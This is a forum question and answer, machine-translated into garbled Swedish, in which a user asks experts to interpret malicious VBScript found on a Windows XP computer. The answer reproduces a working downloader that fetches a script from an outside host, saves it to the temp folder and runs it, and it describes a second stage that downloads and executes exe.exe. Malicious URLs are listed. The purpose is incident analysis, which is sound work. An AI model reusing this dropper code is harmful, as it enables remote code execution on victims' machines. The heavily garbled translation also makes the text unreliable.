Fråga : Kunde ett sakkunnigt behaga försök att tolka denna VBS kodifierar

Vännen för hälsningexperts

A har sett att något ovanligt uppförande med hennes Windows Xp SP3 IE7 dator över förflutnan kopplar ihop av dagar det I-förmiddagen som djupt är misstänksam av.  Jag observerade att den som precis händer över en VNC-anslutning pop för ett fönster för kort tid ago.

A CMD.EXE upp och självfallet waits.
A VBS att spara öppnar i anteckningsbok för Notepad.
When är stängd, den nätt förmiddagen för CMD-fönstret closes.

I sure, som detta är ett ondsint skrivar att försöka att köra VBSEN sparar, utan att specificera programet (CScript eller WScript) för att köra den, och, därför att jag har uppsättningen standardhandlingen för mest ”att skriva” typfiltyper till ”redigerar” handlingen (anteckningsbok) ganska, än ”öppen” den (utför skrivar), den ondsinta aktiviteten är antagligen failing.

On som första orsakar att jag inte bevittnade, spara ”yb.vbs” öppnades i anteckningsbok från användarens den %TEMP% mappen med efter nöjt: för class=" codeSnippet " för

1 för >B= " yb.vbs " " för prettyprint " för class= för id= " codeSnippet800241 " för >


I för <-/pre>
http://jyiop.com/kr/yb.vb s” och sågar att tillfredsställer crudely ”obfuscated” genom att vända om några av parametrarna som visad nedanföra: för class=" codeSnippet " för

1 för >w=3000 för id= " codeSnippet800242 " för >


I nedladdade säkert den hänvisade till nofollowen "” för rel= för _blank " ”för http://jyiop.com/kr/hy/_q .php” som avslöjer detta, kodifierar: för class=" codeSnippet " för

1 för >

<-/pre>


I vet att det inte är alltid möjligheten som får en *.php sparar från en server som är intakt vid det normalahjälpmedel (ie. Gör en anknyta till den och righten-Click > räddningen att uppsätta som mål, som > räddningen, som *.htm sparar av samma känt), och med det riktigt kodifiera, så att kan precis vara serverens svar till mitt försök att nedladda file.
Assuming släktingURLEN, likställer:  rel= " nofollow " " för _blank " för http://jyiop.com/kr/_yoyk. php
then, som löser till rel= " nofollow " " för _blank " för den http://www.google.com
I förmiddagen som testar denna på mitt egna system med rel= " nofollow " " för _blank " för http://www.google.co.uk som hemsidan, så jag vet att den inte omdirigerar precis till min hemsida.

On som de följande orsakar att jag bevittnade över VNC en befalla utfärdades självfallet för att köra spara ”uor.vbs” från användarens den %TEMP% mappen i ett befallafönster, och anteckningsboken poppade upp att innehålla skriva: för class=" codeSnippet " för

1 för >B= " uor.vbs " " för prettyprint " för class= för id= " codeSnippet800244 " för >


Safely > http://ypuii.com/k_/uor.v bs” i en textredaktör avslöjde samma som innan, ie. vänd om strings.

Now, har jag funnit att ”GetSpecialFolder (2)” ser till användarens den %TEMP% mappen, och jag kan se att skriva nedladdar VBSEN sparar och att skapa en VBScript - - flugan, genom att länka samman, stränger och vände om på stränger, men I-förmiddagen som är osäker av exakt vad en skrivanågot liknande detta är göra eller pröva till förmiddagen för do.

I inte mycket är förtrogen med VBS annan än någon grundläggande användning, så hänvisar till efter är ett pussel till mig:

maertS.BDODA = ADOBD.Stream

c.open OT, a, z:
If för c.send () c.Status = x Then
u=c.ResponseBody: d.Open: d.Type = y: d.Write u: d.SaveToFile b: d.Close


I kan se så totalt som dag att Windows Media Player dödas av, om det är rinnande (som det inte var på de materiella tiderna), men jag undrar varför en skulle skriva gör this.

One andra som synes viktiga utfärdar är att jag upptäckte att ”en för en tid sedan skrivad URL” i användarens IE tilltalar bommar för drop-down listar: för href=" http://ypuii.com/k_/zcus/efmjcg.pdf” för
http://ypuii.com/k_/zcus/e fmjcg.pdf
I kunde inte finna som sparar cached någonstans på användarens dator, och hon kan inte ens återkalla när hon skulle har sist öppnade en PDF sparar i hennes webbläsare.  Jag sparade att PDF sparar och, på kontroll i en textredaktör, jag kan se någon nöjd text, som någon sort av skrivat kodifierar och en hänvisa till till ”javaScripten”.  Är efter också fri i en textredaktör:
/gZ för

/Author (MllZTgg yZ=ssA f V) (. s_JUNCVZa #8l=z 96yp2x för b LPD tv/-Xqrf4dY3M: H för ihwBQn E K7gATGe för nolla 0&uFOcj% för S5Rm K?
/Title (qgMpr#AZMZH för I1W) för Ng JGgG?)
/ModDate (D för
/Creator (Kotefekjoesito) för
/Keywords (Mokomeuapaualimajsi): 20100621095906)

Googling för
/Producer (820d5Deawohigejoxamogoga) precis ”skaparen” kända ”Kotefekjoesito” tar mig till denna sida: för href=" http://jsunpack.jeek.org/dec/go?report=c4cc162b45e937762035f286406a989f2adf2753” för
http://jsunpack.jeek.org/d ec/go? report=c4cc162b45e937762035f286406a989f2adf2753
where den visar klart att spara är Malicious.

I kan endast gissa att de tidigare hänvisar till i VBScripten till ”ADOBD.Stream” är en hänvisa till till ”Adobe”, och till en strömma i en maliciously tillverkad PDF spara.  Jag kan endast anta att denna var endera starten av utfärda, eller, att den var en spara hämtade vid ett ondsint skrivar, men jag skulle för att inte ha tänkt det skulle har tillfogat URLEN till den för en tid sedan skrivade URLEN listar.  Det förbryllar i itself.

Probably, inte som en tillfällighet är att googling StrReverse (”maertS.BDODA-" ) tar också mig till för http://jsunpack.jeek.org för nofollow "” för rel= för _blank " ”för platsen " med denna sida: för href=" http://jsunpack.jeek.org/dec/go?report=5d7727607489f01840f34855c5664e662488962e” för
http://jsunpack.jeek.org/d ec/go? report=5d7727607489f01840f34855c5664e662488962e
but den gör inte något att säga som är malicious.

Could som, någon behar råder mig att vad det första skrivar, är rimligt att ha gjort (eller ha försökt att göra) på användarens dator.  Jag skulle något liknande för att veta var jag står, därför att en full systemantiVirus- + RootKit bildläsning har givit inga realitetresultat och, jag kan inte se att någon hänvisar till till VBSEN sparar i registry.
Thanks i advance

Bill
" klar "

Svar : Kunde ett sakkunnigt behaga försök att tolka denna VBS kodifierar

Inte villig förmiddag I att gå så långt, som öppna websitesna som du nämnde emellertid, från skrivar över är här vad jag ser…,

Skriva 1 skapar ett tomt sparar, anknyter till en website och nedladdar det nöjt av sidan och dumpar det in i det tomt sparar.  Detta sparar sparas som ”yb.vbs” och är förment att utföra.
-------------------------------------------------------------------
B= " yb.vbs ",
Med CreateObject (”MSXML2.XMLHTTP”)
      .open ”FÅR”, ”http://jyiop.com/kr/yb.vbs” som är falsk
      .send ()
      Uppsättning A = CreateObject (”Scripting.FileSystemObject”)
      Uppsättning D = A.CreateTextFile (A.GetSpecialFolder (2) + ”\” + B)
      D.WriteLine .responseText
Avsluta med
D.Close
CreateObject (”WScript.Shell”). Kör A.GetSpecialFolder (2) +” \ ”+ B
-------------------------------------------------------------------
Kliva 2 nu, som vbsna sparar har skapats, och kör, det försök att besöka en annan webpage, men denna tid sparar rengöringsduksidan som är nöjd in i en spara som kallas ”exe.exe”.  Detta nytt sparar ska sparas in i användarevikariemappen.
Skriva kör därefter spara ”exe.exe”.
Som du nämnde, taskkill stoppar Windows Media Player - varför, som vet?!?!
Skriva tar därefter bort vben skrivar som kliver skapad 1 (skriva som är för närvarande spring).
Det finns 3 understöder väntan, därefter som spara ”exe.exe” tas bort.

Denna del;
[maertS.BDODA = ADOBD.Stream
c.open OT, a, z: c.send ()
Om c.Status = x därefter
u=c.ResponseBody: d.Open: d.Type = y: d.Write u: d.SaveToFile b: d.Close]
är skrivamaskinskrivningen som öppnar en spara som ska strömmer i webpagen - ingenting att göra med Adobe.  ”c.Status” - skriva väntar webpagen för att vara ordnar till och passformen att nedladda. ”u=c.ResponseBody” tar de rengöringsduksidan och knuffarna det in i en variabel.  Strömma öppnas, och texten nedladdas in i variabeln.  Spara sparas och stängs.  I denna skriva webpagen/spara sparas in i vikariemappen som ”exe.exe”.

Den verkliga faran är att ”exe.exe” sparar.  När den har körts, det finns inte något träffande vad den planlades för att göra.

Att datoren smittas fortfarande med en virus.  Programet ”exe.exe” kunde ha nedladdat andra virus i bakgrunden för att hindra bildläsningar av systemet.  Faktumet, att du kan se det öppna befallafönstret och skriva försöks för att köra berättar mig att det finns något ondsint sparar fortfarande att dröja sig kvar.

Det kan vara tid att utvärdera vilka behov att sparas från det bearbeta med maskin och starta ånyo med en ominstallering av Windows och applikationer.  Det låter dramatiskt men att se, som antivirusen inte avkänner något den krassliga I-funderare som du är på peka av ingen retur.  Minns att, så länge som det ondsint kodifierar är på där, några kör; är det USB-minnespinnen, kameran Etc., kan potentiellt innehålla viruset/trojanen, om det fästes till bearbeta med maskin.
Andra lösningar  
 
programming4us programming4us